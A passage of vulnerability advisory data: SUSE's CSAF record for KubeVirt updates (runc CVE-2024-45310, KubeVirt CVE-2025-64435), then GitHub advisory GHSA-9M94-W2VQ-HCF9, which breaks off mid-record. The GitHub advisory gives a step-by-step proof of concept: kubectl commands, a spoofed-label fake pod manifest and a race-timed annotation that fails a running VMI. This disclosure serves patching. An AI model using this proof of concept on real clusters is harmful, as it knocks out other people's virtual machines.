"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-api-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-controller-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-handler-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-operator-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"product_id": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-container-disk-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-container-disk-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-tests-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-tests-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-api-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-api-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-controller-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-exportserver-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-handler-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-launcher-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-operator-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-150700.3.16.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64"
},
"product_reference": "kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64"
},
"product_reference": "kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T15:34:08Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.7.0-150700.3.16.2.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.7.0-150700.3.16.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T15:34:08Z",
"details": "moderate"
}
],
"title": "CVE-2025-64435"
}
]
}
GHSA-9M94-W2VQ-HCF9
Vulnerability from github – Published: 2025-11-06 23:35 – Updated: 2025-11-17 21:43Summary
_Short summary of the problem. Make the impact and severity as clear as possible._
A logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).
Details
Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.
A vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate virt-launcher pod associated with the VMI.
The virt-launcher pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with virt-handler, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).
When virt-controller receives a notification about a change in a VMI's state, it attempts to identify the corresponding virt-launcher pod. This is necessary in several scenarios, including:
- When hardware devices are requested to be hotplugged into the VMI—they must also be hotplugged into the associated `virt-launcher` pod.
- When additional RAM is requested—this may require updating the `virt-launcher` pod's cgroups.
- When additional CPU resources are added—this may also necessitate modifying the `virt-launcher` pod's cgroups.
- When the VMI is scheduled to migrate to another node.
The core issue lies in the implementation of the GetControllerOf function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate virt-launcher, thereby compromising the VMI's integrity and control mechanisms.
//pkg/controller/controller.go
func CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {
// Get all pods from the VMI namespace which contain the label "kubevirt.io"
objs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)
if err != nil {
return nil, err
}
pods := []*k8sv1.Pod{}
for _, obj := range objs {
pod := obj.(*k8sv1.Pod)
pods = append(pods, pod)
}
var curPod *k8sv1.Pod = nil
for _, pod := range pods {
if !IsControlledBy(pod, vmi) {
continue
}
if vmi.Status.NodeName != "" &&
vmi.Status.NodeName != pod.Spec.NodeName {
// This pod isn't scheduled to the current node.
// This can occur during the initial migration phases when
// a new target node is being prepared for the VMI.
continue
}
// take the most recently created pod
if curPod == nil || curPod.CreationTimestamp.Before(&pod.CreationTimestamp) {
curPod = pod
}
}
return curPod, nil
}
// pkg/controller/controller_ref.go
// GetControllerOf returns the controllerRef if controllee has a controller,
// otherwise returns nil.
func GetControllerOf(pod *k8sv1.Pod) *metav1.OwnerReference {
controllerRef := metav1.GetControllerOf(pod)
if controllerRef != nil {
return controllerRef
}
// We may find pods that are only using CreatedByLabel and not set with an OwnerReference
if createdBy := pod.Labels[virtv1.CreatedByLabel]; len(createdBy) > 0 {
name := pod.Annotations[virtv1.DomainAnnotation]
uid := types.UID(createdBy)
vmi := virtv1.NewVMI(name, uid)
return metav1.NewControllerRef(vmi, virtv1.VirtualMachineInstanceGroupVersionKind)
}
return nil
}
func IsControlledBy(pod *k8sv1.Pod, vmi *virtv1.VirtualMachineInstance) bool {
if controllerRef := GetControllerOf(pod); controllerRef != nil {
return controllerRef.UID == vmi.UID
}
return false
}
The current logic assumes that a virt-launcher pod associated with a VMI may not always have a controllerRef. In such cases, the controller falls back to inspecting the pod's labels. Specifically it evaluates the kubevirt.io/created-by label, which is expected to match the UID of the VMI triggering the reconciliation loop. If multiple pods are found that could be associated with the same VMI, the virt-controller selects the most recently created one.
This logic appears to be designed with migration scenarios in mind, where it is expected that two virt-launcher pods might temporarily coexist for the same VMI: one for the migration source and one for the migration target node. However, a scenario was not identified in which a legitimate virt-launcher pod lacks a controllerRef and relies solely on labels (such as kubevirt.io/created-by) to indicate its association with a VMI.
This fallback behaviour introduces a security risk. If an attacker is able to obtain the UID of a running VMI and create a pod within the same namespace, they can assign it labels that mimic those of a legitimate virt-launcher pod. As a result, the CurrentVMIPod function could mistakenly return the attacker-controlled pod instead of the authentic one.
This vulnerability has at least two serious consequences:
- The attacker could disrupt or seize control over the VMI's lifecycle operations.
- The attacker could potentially influence the VMI's migration target node, bypassing node-level security constraints such as `nodeSelector` or `nodeAffinity`, which are typically used to enforce workload placement policies.
PoC
Complete instructions, including specific configuration details, to reproduce the vulnerability.
Consider the following VMI definition:
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
name: launcher-label-confusion
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
resources:
requests:
memory: 1024M
terminationGracePeriodSeconds: 0
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
# Deploy the launcher-label-confusion VMI
operator@minikube:~$ kubectl apply -f launcher-confusion-labels.yaml
# Get the UID of the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.metadata.uid}'
18afb8bf-70c4-498b-aece-35804c9a0d11
# Find the UID of the `virt-launcher` pods associated with the VMI (ActivePods)
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"}
The UID of the VMI can also be found as an argument to the container in the virt-launcher pod:
# Inspect the `virt-launcher` pod associated with the VMI and the --uid CLI argument with which it was launched
operator@minikube:~$ kubectl get pods virt-launcher-launcher-label-confusion-bdkwj -o jsonpath='{.spec.containers[0]}' | jq .
{
"command": [
"/usr/bin/virt-launcher-monitor",
...
"--uid",
"18afb8bf-70c4-498b-aece-35804c9a0d11",
"--namespace",
"default",
...
Consider the following attacker-controlled pod which is associated to the VMI using the UID defined in the kubevirt.io/created-by label:
apiVersion: v1
kind: Pod
metadata:
name: fake-launcher
labels:
kubevirt.io: intruder # this is the label used by the virt-controller to identify pods associated with KubeVirt components
kubevirt.io/created-by: 18afb8bf-70c4-498b-aece-35804c9a0d11 # this is the UID of the launcher-label-confusion VMI which is going to be taken into account if there is no ownerReference. This is the case for regular pods
kubevirt.io/domain: migration
spec:
restartPolicy: Never
containers:
- name: alpine
image: alpine
command: [ "sleep", "3600" ]
operator@minikube:~$ kubectl apply -f fake-launcher.yaml
# Get the UID of the `fake-launcher` pod
operator@minikube:~$ kubectl get pod fake-launcher -o jsonpath='{.metadata.uid}'
39479b87-3119-43b5-92d4-d461b68cfb13
To effectively attach the fake pod to the VMI, the attacker should wait for a state update to trigger the reconciliation loop:
# Trigger the VMI reconciliation loop
operator@minikube:~$ kubectl patch vmi launcher-label-confusion -p '{"metadata":{"annotations":{"trigger-annotation":"quarkslab"}}}' --type=merge
virtualmachineinstance.kubevirt.io/launcher-label-confusion patched
# Confirm that fake-launcher pod has been associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"39479b87-3119-43b5-92d4-d461b68cfb13":"minikube", # `fake-launcher` pod's UID
"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube"} # original `virt-launcher` pod UID
To illustrate the impact of this vulnerability, a race condition will be triggered in the sync function of the VMI controller:
// pkg/virt-controller/watch/vmi.go
func (c *Controller) sync(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume) (common.SyncError, *k8sv1.Pod) {
//...
if !isTempPod(pod) && controller.IsPodReady(pod) {
// mark the pod with annotation to be evicted by this controller
newAnnotations := map[string]string{descheduler.EvictOnlyAnnotation: ""}
maps.Copy(newAnnotations, c.netAnnotationsGenerator.GenerateFromActivePod(vmi, pod))
// here a new updated pod is returned
patchedPod, err := c.syncPodAnnotations(pod, newAnnotations)
if err != nil {
return common.NewSyncError(err, controller.FailedPodPatchReason), pod
}
pod = patchedPod
// ...
func (c *Controller) syncPodAnnotations(pod *k8sv1.Pod, newAnnotations map[string]string) (*k8sv1.Pod, error) {
patchSet := patch.New()
for key, newValue := range newAnnotations {
if podAnnotationValue, keyExist := pod.Annotations[key]; !keyExist || podAnnotationValue != newValue {
patchSet.AddOption(
patch.WithAdd(fmt.Sprintf("/metadata/annotations/%s", patch.EscapeJSONPointer(key)), newValue),
)
}
}
if patchSet.IsEmpty() {
return pod, nil
}
patchBytes, err := patchSet.GeneratePayload()
// ...
patchedPod, err := c.clientset.CoreV1().Pods(pod.Namespace).Patch(context.Background(), pod.Name, types.JSONPatchType, patchBytes, v1.PatchOptions{})
// ...
return patchedPod, nil
}
The above code adds additional annotations to the virt-launcher pod related to node eviction. This happens via an API call to Kubernetes which upon success returns a new updated pod object. This object replaces the current one in the execution flow.
There is a tiny window where an attacker could trigger a race condition which will mark the VMI as failed:
// pkg/virt-controller/watch/vmi.go
func isTempPod(pod *k8sv1.Pod) bool {
// EphemeralProvisioningObject string = "kubevirt.io/ephemeral-provisioning"
_, ok := pod.Annotations[virtv1.EphemeralProvisioningObject]
return ok
}
// pkg/virt-controller/watch/vmi.go
func (c *Controller) updateStatus(vmi *virtv1.VirtualMachineInstance, pod *k8sv1.Pod, dataVolumes []*cdiv1.DataVolume, syncErr common.SyncError) error {
// ...
vmiPodExists := controller.PodExists(pod) && !isTempPod(pod)
tempPodExists := controller.PodExists(pod) && isTempPod(pod)
//...
case vmi.IsRunning():
if !vmiPodExists {
// MK: this will toggle the VMI phase to Failed
vmiCopy.Status.Phase = virtv1.Failed
break
}
//...
vmiChanged := !equality.Semantic.DeepEqual(vmi.Status, vmiCopy.Status) || !equality.Semantic.DeepEqual(vmi.Finalizers, vmiCopy.Finalizers) || !equality.Semantic.DeepEqual(vmi.Annotations, vmiCopy.Annotations) || !equality.Semantic.DeepEqual(vmi.Labels, vmiCopy.Labels)
if vmiChanged {
// MK: this will detect that the phase of the VMI has changed and updated the resource
key := controller.VirtualMachineInstanceKey(vmi)
c.vmiExpectations.SetExpectations(key, 1, 0)
_, err := c.clientset.VirtualMachineInstance(vmi.Namespace).Update(context.Background(), vmiCopy, v1.UpdateOptions{})
if err != nil {
c.vmiExpectations.LowerExpectations(key, 1, 0)
return err
}
}
To trigger it, the attacker should update the fake-launcher pod's annotations before the check vmiPodExists := controller.PodExists(pod) && !isTempPod(pod) in updateStatus, and after the check if !isTempPod(pod) && controller.IsPodReady(pod) in sync but before the patch API call in syncPodAnnotations, as follows:
annotations:
kubevirt.io/ephemeral-provisioning: "true"
The above annotation will mark the attacker pod as ephemeral (i.e., used to provision the VMI) and will fail the VMI as the latter is already running (provisioning happens before the VMI starts running).
The update should also happen during the reconciliation loop, at the point when the fake-launcher pod is initially being associated with the VMI and its eviction-related annotations are being updated.
Upon successful exploitation the VMI is marked as Failed and can no longer be controlled via the Kubernetes API. However, the QEMU process is still running and the VMI is still present in the cluster:
operator@minikube:~$ kubectl get vmi
NAME AGE PHASE IP NODENAME READY
launcher-label-confusion 128m Failed 10.244.0.10 minikube False
# The VMI is not reachable anymore
operator@minikube:~$ virtctl console launcher-label-confusion
Operation cannot be fulfilled on virtualmachineinstance.kubevirt.io "launcher-label-confusion": VMI is in failed status
# The two pods are still associated with the VMI
operator@minikube:~$ kubectl get vmi launcher-label-confusion -o jsonpath='{.status.activePods}'
{"674bc0b1-e3c7-4c05-b300-9e5744a5f2c8":"minikube","ca31c8de-4d14-4e47-b942-75be20fb9d96":"minikube"}
Impact
As a result, an attacker could provoke a DoS condition for the affected VMI, compromising the availability of the services it provides.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.7.0-beta.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64435"
],
"database_specific": {
"cwe_ids": [
"CWE-703"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-06T23:35:24Z",
"nvd_published_at": "2025-11-07T23:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\n_Short summary of the problem. Make the impact and severity as clear as possible.\n\nA logic flaw in the `virt-controller` allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate `virt-launcher` pod associated with the VMI. This can mislead the `virt-controller` into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service).\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\nA vulnerability has been identified in the logic responsible for reconciling the state of VMI. Specifically, it is possible to associate a malicious attacker-controlled pod with an existing VMI running within the same namespace as the pod, thereby replacing the legitimate `virt-launcher` pod associated with the VMI.\n\nThe `virt-launcher` pod is critical for enforcing the isolation mechanisms applied to the QEMU process that runs the virtual machine. It also serves, along with `virt-handler`, as a management interface that allows cluster users, operators, or administrators to control the lifecycle of the VMI (e.g., starting, stopping, or migrating it).\n\nWhen `virt-controller` receives a notification about a change in a VMI\u0027s state, it attempts to identify the corresponding `virt-launcher` pod. 
This is necessary in several scenarios, including:\n\n- When hardware devices are requested to be hotplugged into the VMI\u2014they must also be hotplugged into the associated `virt-launcher` pod.\n- When additional RAM is requested\u2014this may require updating the `virt-launcher` pod\u0027s cgroups.\n- When additional CPU resources are added\u2014this may also necessitate modifying the `virt-launcher` pod\u0027s cgroups.\n- When the VMI is scheduled to migrate to another node.\n\nThe core issue lies in the implementation of the `GetControllerOf` function, which is responsible for determining the controller (i.e., owning resource) of a given pod. In its current form, this logic can be manipulated, allowing an attacker to substitute a rogue pod in place of the legitimate `virt-launcher`, thereby compromising the VMI\u0027s integrity and control mechanisms.\n\n```go\n//pkg/controller/controller.go\n\nfunc CurrentVMIPod(vmi *v1.VirtualMachineInstance, podIndexer cache.Indexer) (*k8sv1.Pod, error) {\n\t// Get all pods from the VMI namespace which contain the label \"kubevirt.io\"\n\tobjs, err := podIndexer.ByIndex(cache.NamespaceIndex, vmi.Namespace)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tpods := []*k8sv1.Pod{}\n\tfor _, obj := range objs {\n\t\tpod := obj.(*k8sv1.Pod)\n\t\tpods = append(pods, pod)\n\t}\n\n\tvar curPod *k8sv1.Pod = nil\n\tfor _, pod := range pods {\n\t\tif !IsControlledBy(pod, vmi) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif vmi.Status.NodeName != \"\" \u0026\u0026\n\t\t\tvmi.Status.NodeName != pod.Spec.NodeName {\n\t\t\t// This pod isn\u0027t scheduled to the current node.\n\t\t\t// This can occur during the initial migration phases when\n\t\t\t// a new target node is being prepared for the 